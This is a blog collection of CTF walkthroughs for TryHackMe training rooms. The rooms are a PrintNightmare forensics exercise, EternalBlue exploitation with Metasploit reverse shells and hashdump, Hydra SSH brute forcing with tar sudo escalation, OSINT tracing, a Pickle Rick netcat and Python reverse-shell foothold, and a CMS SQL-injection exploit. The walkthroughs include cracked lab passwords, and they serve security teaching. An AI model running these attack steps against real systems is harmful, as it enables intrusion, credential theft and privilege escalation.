PrintNightmare, Again! CTF Walkthrough

Hackerween 2022 - Day 1

Armand Alvarez | Thursday, October 27, 2022


What is Hackerween?

Hackerween is a holiday-challenge that has 5 rooms, one released each day from the 27th of October up until Halloween! These rooms will increase in difficulty, with the first two rooms being for beginners, then getter harder and harder. You can read more at this blog post.

The first Room - PrintNightmare, Again!

The first room can be found here

The scenario describes an employee overhearing two co-workers discussing the PrintNightmare exploit and how they can use it to elevate their privileges on their local computers.

Our task is to inspect the artifacts on the endpoint and to detect the exploit they used.

We have a few more notes:

  • Note: Use the FullEventLogView tool. Go to Options > Advanced Options and set Show events from all times.

So, we know that this room deals with the PrintNightmare vulnerability, or CVE-2021-34527. You can read the Microsoft Security Response Center (MSRC) report on it here

To summarize the writeup, a RCE vuln exists when the Windows Print Spooler service improperly performs privileged file operations. It can allow an attacker to run code with SYSTEM privileges. The security update for Windows Server 2012, Win Server 2016, and Windows 10, version 1607 has been released.

We also see the notes: "In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design."

Once our machine has launched, we can click Show Split View at the top of the page to open a side window with the Windows machine.


Going through the tasks

The user downloaded a zip file. What was the zip file saved as?

We are greeted to a Desktop with two files on it: traffic.pcap (a PCAP, or packet capture, file) and Logfile.CSV, which we can presume to be some sort of log file.

Before we analyze, lets talk about the five tools we have on our Taskbar:

  • FullEventLogView: A tool that displays in a table the details of all events from the event logs of Windows

  • ProcDOT: Turns thousands of monitored activities into a big behavioral picture

  • Wireshark: Network protocol analyzer, this lets us view packet capture details

  • Brim: Network forensics and packet capture analyzer

  • Powershell: CLI tool to interact with the computer (kind of like the Windows version of Terminal)

Our Hint says to try using ProcDOT or FullEventLogView.

We can dump our Logfile.CSV into the Procmon portion of the ProcDOT application, and our traffic capture into the Windump portion. We can use the plugin "Files List" to view a list of files from our logfile and PCAP. If we search for any file with .zip, we see that the user BMurphy had a file in their Downloads folder called "levelup.zip". ProcDot also tells us that this file no longer exists.

The answer is levelup.zip

What is the full path to the exploit the user executed?

Now, lets look at the graph of how our user interacted with Powershell. We already loaded our Procmon and Windump monitoring logs into ProcDOT, now select the powershell process under "Render Configuration" and click Refresh. This generates a graph of all the processes and threads that Powershell created and how it interacted with different files. We see an interesting PS1 file, which is a powershell script. It is stored under a directory called CVE-2021-1675 which is related to the PrintNightmare vulnerability. If you put the full path of this Powershell script, you get the answer. This file was also deleted.

c:\users\bmurphy\Downloads\CVE-2021-1675-main\CVE-2021-1675.ps1

We could also find this PS1 file in our Files List plugin, using the same method as before.

What was the temp location the malicious DLL was saved to?

We are looking for a temp location, so we can go back to our Files List and search for any DLL by searching for the string ".dll". We see a temp location at c:\users\bmurphy\appdata\local\temp\3\nightmare.dll. This is the location.

What was the full location the DLL loads from?

We see another location that the nightmare.dll file used to be at, c:\windows\system32\spool\drivers\x64\3\new\nightmare.dll

What is the primary registry path associated with this attack?

This part requires a lot of digging on our graph. When looking under the processes to view (by selecting the Render Configuration Launcher in ProcDOT), I saw backgroundTaskHost. This is a normal windows EXE, but it seemed weird to me so I selected that and refreshed my graph. I then saw that it was touching an Autostart registry key (registry path.) This is really bizarre to me. Why would an Exe that is part of the Windows Cortana software be touching an Autostart location???

I started stepping through the event step-by-step. (You can do that with the controls ont he bottom of the application). We see that backgroundTaskHost.exe first kills its own process before setting the Autostart registry key. This kicks off spoolsv.exe which then copies the temporary exploit location to a more permanent one whcih we will call "New". Eventually it renames the file, taking out the "New" and it is just c:\Windows\System32\spool\drivers\x64\3\nightmare.dll.

Then, it creates the New file again, continues copying the temporary Nightmare.dll to it, then it queries and sets the PendingFileNameOperations registry, which can be used to automatically delete or move a file on reboot with values of a mxdwdrv.dll and nightmare.dll. We can guess the actor is probably trying to hide the nightmare.dll date in this system32/spool/driver location. They also create a new mxdwdrv.dll and rename it to the original one. Then it writes data to this mx dll. It finally sets the THMPrinter configuration file & Data file to the nightmare.dll information, and the driver to this new, fake mxdwdrv.dll file.

To summarize, it seems like it messed with Autostarts (super scary), hid this nightmare.dll in another, normal looking dll, then had the Printer data file load from this normal looking dll, which contained the malicious nightmare.dll code. Super scary stuff!

HKLM\System\CurrentControlSet\Control\Print\Environments\Windows x64\Drivers\Version-3\THMPrinter\Data File

What was the PID for the process that would have been blocked from loading a non-Microsoft-signed binary?

The process that has been loading the malicious files is spoolsv.exe, with a PID of 2600. So, ideally, it should have been blocked from loading this non-Microsoft-signed binary.

What is the username of the newly created local administrator account?

We can run the command "net user" to see the users on a machine. We can see the user backup which is a bit suspicious on a workstation.

What is the password for this user?

To do this, the hint tells us to use ProcDOT to find the Powershell history file. We can go to the powershell.exe launcher in the Render Configuration, and load the graph. From there, open the Files List and you can see the powerhshell consolehost_history.txt file location. After, you can go on powershell and invoke the command get-content <location to powershell history file> to see its contents. This gives you the username and password for the new user.

The password is ucGGDMyFHkqMRWwHtQ

What two commands did the user execute to cover their tracks? (no space after the comma)

In the same file we can see two commands that stick out for covering tracks, a rmdir command and a del command. These are the answers. Our actor removed the CVE directory and deleted the levelup.zip file.

rmdir .\CVE-2021-1675-main\,del .\levelup.zip


This was absolutely a difficult CTF, and if you didn't get it the first time, don't fret. I have done my fair share of CTF's on TryHackMe, and I struggled.... a lot. Read up on how to use ProcDOT, there are a lot of good articles out there. And if all else fails, just poke around a bit. You may find something you didn't expect.

*Notes: I could not get FullEventLogView to work. I gave it the full path for the .CSV log file and it wouldn't work. Kept giving me an error about the path being corrupted or something. If anybody has suggestions, please tweet me @_Armand_Alvarez. Happy Hacking!!

Blue

Blue

Armand Alvarez | Friday, 05 November 2021


Since I use tmux, and I use multiple sessions, I set the tmux env variable $IP to the IP address givent to me by THM.

 └─$ tmux setenv IP 10.10.91.32

Nmap

# Nmap 7.91 scan initiated Fri Nov  5 22:39:26 2021 as: nmap -sCV -v -oN initial 10.10.91.32
Increasing send delay for 10.10.91.32 from 0 to 5 due to 255 out of 848 dropped probes since last increase.
Nmap scan report for 10.10.91.32
Host is up (0.11s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2021-11-06T02:40:39+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-11-05T02:12:25
| Not valid after:  2022-05-07T02:12:25
| MD5:   860d 0816 ffbb 1bde 790e f320 9a87 3abb
|_SHA-1: b33b 9c4e b514 c812 32b1 324c 397d 10e6 6c9b 3ad8
|_ssl-date: 2021-11-06T02:40:44+00:00; +1s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h14m09s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: , NetBIOS MAC: 02:fd:9f:77:75:ad (unknown)
| Names:
|   JON-PC<00>           Flags: 
|   WORKGROUP<00>        Flags: 
|   JON-PC<20>           Flags: 
|   WORKGROUP<1e>        Flags: 
|   WORKGROUP<1d>        Flags: 
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: 
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-05T21:40:38-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-06T02:40:38
|_  start_date: 2021-11-06T02:12:24

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  5 22:40:43 2021 -- 1 IP address (1 host up) scanned in 77.09 seconds

We can see from this that the machine has SMB running - with the OS: Windows 7 Service Pack 1. The SMBv1 server in this OS is vulnerable to Eternal Blue, or CVE-2017-0144 CVE link. This vulnerability was published in MS security bulletin ms17-010 MS Bulletin

Metasploit

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Launch Metasploit on linux with `msfconsole`. You can search for either the ms # (ms17-010) or the CVE # (2017-0144) and find similar results.
We can see the exploit path is exploit/windows/smb/ms17_010_eternalblue

Options

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.240    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

The options show us a few required options. The only one not set is RHOSTS - which is the target host (see description.)

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.91.32
rhosts => 10.10.91.32

Set the payload to a reversetcp shell

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp

Make sure if you are running openvpn (THM usually requires it) you set the LHOST (local host option) to your tun0 ip. You can find this by running `ifconfig`

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.6.77.21
LHOST => 10.6.77.21

It took me letting the exploit run a few times but I finally got in.

Upgrading from normal shell to meterpreter shell

I am using this writeup to convert the shell.

First, background the current (Normal Shell) session.

C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) > 

Select the shell_to_meterpreter module

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade

Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > 

Our options show that we must add the SESSION.

msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to au
                                       to detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Set our session to 1 and run.

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.32)
  2         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.32)

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1

Now that it has created a new meterpreter session, we can open it

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.3
                                                                   2)
  2         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.3
                                                                   2)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.6.77.21:4433 -> 10.10.91.32:49246 (10.10.91.3
                                                                   2)

msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > 

Meterpreter

After I got the ugpraded shell, I ran the command `shell` to open a dos shell then `whoami` to verify I was indeet NT AUTHORITY\SYSTEM. Then I ran the `ps` command to list all running processes, and `migrate` to a process running at NT AUTHORITY\SYSTEM

Cracking the password

Dump all the hashes of the users on this machine. You can do this because you are on an elevated shell.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

I copied this hash into a file and used hashcat to crack it. This article shows how to do that.

└─$ hashcat -m 1000 --show hash /usr/share/wordlists/rockyou.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Finding the Flags

The first flag can be found at the root of the machine.

meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx   4096   dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx   0      dir   2018-12-12 22:13:22 -0500  Recovery
40777/rwxrwxrwx   4096   dir   2018-12-12 18:01:17 -0500  System Volume Information
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx   16384  dir   2009-07-13 23:20:08 -0400  Windows
100666/rw-rw-rw-  24     fil   2018-12-12 22:47:39 -0500  flag1.txt
0000/---------    0      fif   1969-12-31 19:00:00 -0500  hiberfil.sys
0000/---------    0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter > 

The second flag is in the C:\Windows\System32\config location. This is where passwords are stored.

I was having trouble finding the final flag. But I realized on meterpreter you can do search -f flag* to search for any files that begin with "flag". This showed me the location of the final flag. It is in Jon's documents.


That's all! Happy hacking 🙂

Bounty Hacker

Bounty Hacker

TO SEE THE FULL WRITE-UP WITH IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 16 August 2021

github.com/Armand-Alvarez

Room Link on TryHackMe


Find open ports on the machine

nmap

We can see we have the following ports open:

  • 21 - ftp

  • 22 - ssh

  • 80 - http


Who wrote the task list?

FTP

We can see from our nmap scan that ftp allows anonymous login so lets explore that first.

ftp

After logging in, we begin in the root directory with nothing but two files. We can download these to our local machine using the wget command.

task.txt

Reading the file on our local machine shows that lin wrote it.


What service can you bruteforce with the text file found?

The other file we found is called locks.txt:

locks.txt

It looks like a file of possible passwords. We can try using this later.

Lets check out the website.

website homepage

The homepage has nothing important in it, and the page source doesn't contain anything hidden either.

Gobuster revealed a /images directory that only stores the picture we see on the home page. Nothing important there.

Nikto revealed a few things, but nothing relevant right now:

nikto

Given that the website has lead to a dead end right now, the only other service that we can use the password file on is SSH.


What is the users password?

Hint: Hydra may be able to help.

Lets use Hydra to try to figure out which password works with SSH. We can guess that lin is the username for SSH, figuring that is the only name we have gotten so far.

hydra

We see our successful password is RedDr4gonSynd1cat3.

Testing it on SSH works.

ssh_lin


user.txt

Once we get into the IP via SSH, we can cat the file.

user.txt

The flag for the user is: THM{CR1M3_SyNd1C4T3}


root.txt

Running sudo -l as lin gives us the following:

sudo -l

We can see that lin may run /bin/tar as root. This is great!

Getting on gtfobins, we can search for "tar" and click SUDO (because we have sudo privilages for tar), and are given the following command:

tar sudo

Once we run this command on the SSH terminal, we gain root privilages. We can then read root.txt to find the flag: THM{80UN7Y_h4cK3r}

root


Thats all! Happy hacking.

🙂

OhSINT

OhSINT

TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 17 July 2021

Room link

Github Link


Task 1: OhSINT

First download the task file.

Inspecting the base image

Using the eog <image.png> command to view the image we just downloaded, all we see is the old WindowsXP background image.

original image

On its own, this is nothing important, but what if we could dig deeper into the image.

What is this users avatar of?

The very first question asks us what this users avatar is of. Looking at the original photo we downloaded, I have no idea. Lets use a tool called Exiftool to look at some metadata.

According to the man file "Exiftool is a command-line interface..., used for reading and writing meta information in a variety of file types." In other words, it is a steganography analysis tool.

Using this tool, we can see metadata of the image, and find who holds the copywrite.

exiftool


Searching for OSINT

We see an OWoodflint as the copyright holder for the image we downloaded. Lets look this up on google.

The first result is this twitter account.

twitter home

The first question asks what the user's avatar is, putting in cat is the correct answer.

What city is this person in?

The twitter account has two posts, one of which says:
From my house I can get free wifi ;D Bssid: B4:5D:50:AA:86:41 - Go nuts!

The term BSSID is one used to describe a section of a wireless network (WLAN) - it stands for Basic Service Set Identifier. Basically the MAC address of the access point. It is a way of identifying access points and their associated clients. You can get more information here

This can be used to find the location of the WLAN. A website called wigle.net "consolidates location and information of wireless networks world-wide to a central database."

wigle

We can put the BSSID in wigle and find a location in London.

Whats the SSID of the WAP he connected to?

By creating an account, we can search up the BSSID and find the SSID of the WAP. We see the result shown is UnileverWiFi

wapSSID

What is his personal email address?

So, we basically got all we could out of the BSSID, lets look for another method of finding this person's email address.

Our best tool is actaully google. We still have that username, owoodflint. Doing a simple google search of this also shows up the github. This has his email.

github

What site did you find his email address on?

We found it on github! See the previous question above.

Where has he gone on holiday?

There isn't much else on his github, we may return there later, but for now lets examine what other accounts we can find using google.

OH! We see a wordpress blog.

wordpress

It says they are in New York right now, but we know that they live in London. So this must be where they are on vacation.

What is this persons password?

This was a tough one, admittedly. I kept google dorking this dude's name in different ways, and was having trouble finding anything useful. (BTW I will give a big google dork hint to help you get less garbage in your google searches during a CTF at the end of this page)

Anyway, I looked back at the original google search of owoodflint and found something that stuck out to me. Take a look and see if you can spot it too.

googlesearch

Did you see it? Look at the description of the first result. What is that word, "pennYDr0pper"? I don't remember seeing anything that ludicrious on the page! Lets take a closer look on the blog.

blog

Its not on the page, that we can see. But the word came right after the word "photos!" in the google search result description.

Lets try highlighting all the text with ctrl + A

highlighted text

There it is! It looks to be the same format as our text input should be on the TryHackMe page, and it works as our password.

Also, for you dorks out there inspecting the source, you can find it there too.

source


And thats all! But wait...

If you looked closely at my search before, you may have seen it look a little weird:

search

This is an example of whats called a google dork Google dorking, or google hacking, is a technique for finding open-source intelligence on Google. You can modify your google search to become more or less restrictive through google dorking.

For example, in the picture I put -tryhackme. This is because a lot of the search results I would get when searching the phrase oliver woodflint or owoodflint would bring up writeups for the TryHackMe challenge that I was in the middle of doing. This is annoying to sift through, and can waste time figuring out what result is a writeup and what result is legitimate.

So, when you put a - sign directly in front of a phrase in a google search, it tells google to hide any results with that phrase. So my -tryhackme took all the results that had the word tryhackme in it and threw them in the trash. You can also put stuff like -osint, -OhSINT (the name of the challenge), -writeup in the google search to really get rid of all the writeups and keep it only to the content that the CTF author intended to show up (plus maybe one or two legitimate people or businesses named Oliver Woodflint)

Have fun, and good luck on your OSINT adventures!

🙂

Pickle Rick

Pickle Rick

TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 31 July 2021

Room Link

Github Link


Task 1: Pickle Rick

With this box, we are given nothing but an IP address, and 3 questions, each asking the name of 1 ingredient that Rick needs. So lets begin.

The First Ingredient

Lets start poking at this IP address we have, see what comes up.

Running the nmap command: nmap -sC -sV -O -oN nmap.txt <IP> gives us the following

nmap

Lets break this nmap command down:

  • nmap - Tells linux to run an nmap scan
  • -sC - Runs default scripts
  • -sV - Probes open ports to determine service/version info
  • -O - Enables OS detection
  • -oN nmap.txt - Outputs the scan in the normal format to the file nmap.txt
  • 10.10.55.186 - The IP address of our box

The output tells us that there are two services running: SSH and HTTP.

Since we know there is a web service, I will start up gobuster, a tool for enumerating the directories of a website. I will go over the details later, but while that is running in the background, lets take a look at the website.


website home

There isn't much to it. A picture and some unassuming text. Taking a look at the page source (on firefox, right-click, then select View Page Source) we can find a username: R1ckRul3s.

website home viewing source

Nice! Our first half of a set of credentials (still need the password.) Make sure you write this down for later.

Lets see if there is a robots.txt page. Oh, I should probably explain what that is. Google's developers documentation says that a robots.txt page "tells search engine crawlers which URLs the crawler can access on your site. It is used mainly to avoid overloading your site with requests." Cool! So basically, instead of a robot on the internet having to check every single page your website has to see if it can access it, it can look at the robots.txt page to see where it is allowed to go, saving your website the overhead.

If we navigate to /robots.txt on our web browser, all we get is the text: Wubbalubbadubdub

Not too interesting, but, like any text that stands out, you should write it down and see if it does anything interesting later.


Lets go back to our gobuster results.

gobuster

2 results, /assets and /server-status, both of which aren't very interesting. I will let you explore them as you wish.

For now, I will explain what gobuster is, the input, and how to interpret the output. Gobuster is a tool that enumerates directories on a web server. Basically, when you are given an IP address, if you type it into the address bar on the top of a web browser, it takes you to that website's home page. There are often times other pages within that web server address, that can be found by putting a / character after the IP address (1.2.3.4/robots.txt or 14.32.122.34/assets.)

gobuster dir -u http://10.10.74.255 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

Lets break down this command:

  • gobuster - the command to run the gobuster program
  • dir - Run in directory mode, because we are enumerating web server directories
  • -u http://10.10.74.255 - Gives the url to gobuster
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt - Gives the wordlist to run against the url. If you have kali linux, the /usr/share/wordlists directory is an amazing directory that contains a whole bunch of wordlists to use for many different things. The dirbuster/directory-list-2.3-medium.txt is a good one to use for gobuster directory enumeration.
  • | - Pipes the output into the following command
  • tee - This command takes the output and both shows it on the terminal screen (which is called standard output) and saves the output to a file of your choice
  • gobuster.txt - The name of the file to save the gobuster results to

On the bottom of the gobuster output, you see /assets and /server-status which are the directories the program found.


I also ran nikto on the IP address to look for any known vulnerabilities. The output revealed something interesting...

nikto

An Admin login page called /login.php. Lets explore this.


login

Nice!! A login page. We know from earlier that a valid username should be R1ckRul3s. The only other information we have gathered so far was that random Wubbalubbadubdub from the robots.txt page. Lets try that out.


command panel

Awesome, it brought us to a new page, Command Panel. Given this is a command panel, if we try the command ls, it outputs a list of files.

trying ls command in command panel

Here, we see one file in particular, Sup3rS3cretPickl3Ingred.txt. Trying the cat command to read it doesn't work, the command has been disabled. Trying head also doesn't work, but less works!

less ingredientfile command panel

Our first ingredient is mr. meeseek hair


The Second Ingredient

Since this is a command panel, and it clearly runs linux commands, lets see if we can run a reverse shell script on it.

First, open a new tab on your terminal and run the command:

nc -lvnp 1234

This tells netcat to:

  • -l - listen for inbound connects
  • v - verbose
  • n - numeric-only IP addresses, no DNS
  • p - specify the port to listen on

So now netcat is listening on port 1234 for connections coming into it. The connection would have to come into our openvpn IP address.

nc listening

We can find our openvpn IP address with the command: ip a s

ip

The ip address we want to use for our reverse shell is tun0 (in my case, 10.6.77.21)

Going back to the command panel, lets see if we have access to python3. Typing python3 --version gives us a response with the version number, so we know we can use python3. Head over to the pentest monkey cheatsheet to grab the Python reverse shell. (BTW, pentest monkey is an amazing resource for spawning a reverse shell if you have command execution vulnerabilities, which is the command panel we have been using.)

Throw this line of code into sublime or vim to edit it, we need to change what version of python we are using and the IP address:

  • Change [python] -> [python3] - this is because we don't know if we have python, but we know we have python3.
  • Change [10.0.0.1] -> [your tun0 IP address we got before] - This sends the connection to that IP address, which netcat is listening to. The port number (1234) can stay the same because netcat is listening to that port number, but if you chose a different one during the netcat setup, make sure you change the port in the reverse shell code to the one you picked.

Throw that new line of code into the command execution panel and run it. Going back to our netcat, we see that we are on!

netcat connected to reverse shell


Lets explore this shell a little bit.

Running whoami tells us we are www-data. pwd tells us we are in /var/www/html We can read the clue.txt file and we get back "Look around the file system for the other ingredients" so lets go do that.

Heading into the /home directory we see two users: rick and ubuntu
The rick directory has just one file: second ingredient. Reading it gives us 1 jerry tear!!!! That is our second ingredient 🙂


The Third Ingredient

So, we got basically all we need from the Rick directory, what about checking out that /root directory. If you try, you can see that you aren't allowed in. This is because we don't have root privileges to get into that directory. Lets try and change that.

Typing sudo -l will tell us what commands the current user (www-data) is allowed (and forbidden) to run.

sudo l

The bottom shows that www-data may run (ALL) NOPASSWD: ALL, meaning that we can run nearly any command as sudo without a password. Knowing this, typing sudo -i will run a new shell as root, giving you that root access that we needed before.

sudo i

From here, we can find the flag in the /root directory and read it for the last ingredient: fleeb juice

flag


And that is really all there is! As you can see, sometimes sudo -l can reveal that you can run virtually any sudo command, which is a horrible mistake on the side of the security manager, but great for you. Happy hacking!

🙂

Simple CTF

Simple CTF

TO SEE THIS WRITE-UP WITH ALL IMAGES, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 11 August 2021

github.com/Armand-Alvarez

Room link on TryHackMe


Since this is a simple room, we will go through the questions and I will show my thought process and work to solve each question.

How many services are running under port 1000?

To figure this out, we need to run a specific nmap command:

nmap

Lets go over this command:

sudo nmap 10.10.127.163 -p1-1000 -T5 -oN nmap.txt

  • sudo nmap 10.10.127.163 - Runs nmap as a superuser on IP 10.10.127.163 (this was the IP of the box I needed to get into)

  • -p1-1000 - Scan ports 1-1000 (the first 1000 ports)

  • -T5 - Run the fastest scan you can (1 is slowest, 5 is fastest)

  • -oN nmap.txt - Put normal-output in the file nmap.txt

We see that there are 2 ports open in the first 1000: port 21 and port 80!


What is running on the higher port?

We only see 2 ports with our small 1-1000 scan, but if we run a larger scan we may see more information.

big nmap

Running our scan with -sC and -sV we see the addition of a port 2222 running ssh

What's the CVE you're using against the application?

If we go to the ip address on a web browser, we are just greeted with the default Apache2 page.

home

Running gobuster reveals /simple. Lets check it out.

simple

This is more interesting! Exploring the page also reveals the version of CMS:

simple version

Let's search this version on ExploitDB to see if it reveals anything.

Searchsploit is a kali command that can search for exploits found on exploitDB. We searched for the keywords cms, 2.2.8, made, and simple. It revealed an SQLI:

searchsploit

Running the same command with the -w argument will also show the exploit-db url, which will reveal the CVE number:

cve

Looks like we are using CVE-2019-9053.


To what kind of vulnerability is the application vulnerable?

We know this is a SQLI or an sql injection.


What's the password?

To use the exploit, lets copy it into the current working directory. (I recommend making a separate directory for each TryHackMe room you do.)

Our original searchsploit result gave part of the path: php/webapps/46635.py.

We can run the following command to copy it to your current working directory:

sudo cp /usr/share/exploitdb/exploits/php/webapps/46635.py exploit.py

The exploit database is kept in /usr/share for kali linux users, we know it is an exploit by our searchsploit results, and the rest of the path was given to us. I saved it as exploit.py in my directory.

Now lets try running the exploit:

exploit

If you type in python2 ./exploit.py, it will give you examples usage of the exploit, which is how I knew what command to run.

We see that the password is secret


Where can you login with the details obtained?

We can log into the FTP server as anonymous and download the only file in it. It contains nothing important, so we don't need the login details there.

Trying the ssh we need a username and password, lets try Mitch and our newly obtained password.

ssh mitch@10.10.127.163 -p 2222 - remember we have to use port 2222 because ssh is not running on port 22 on this box. Using the password we got earlier, we can successfully log in.

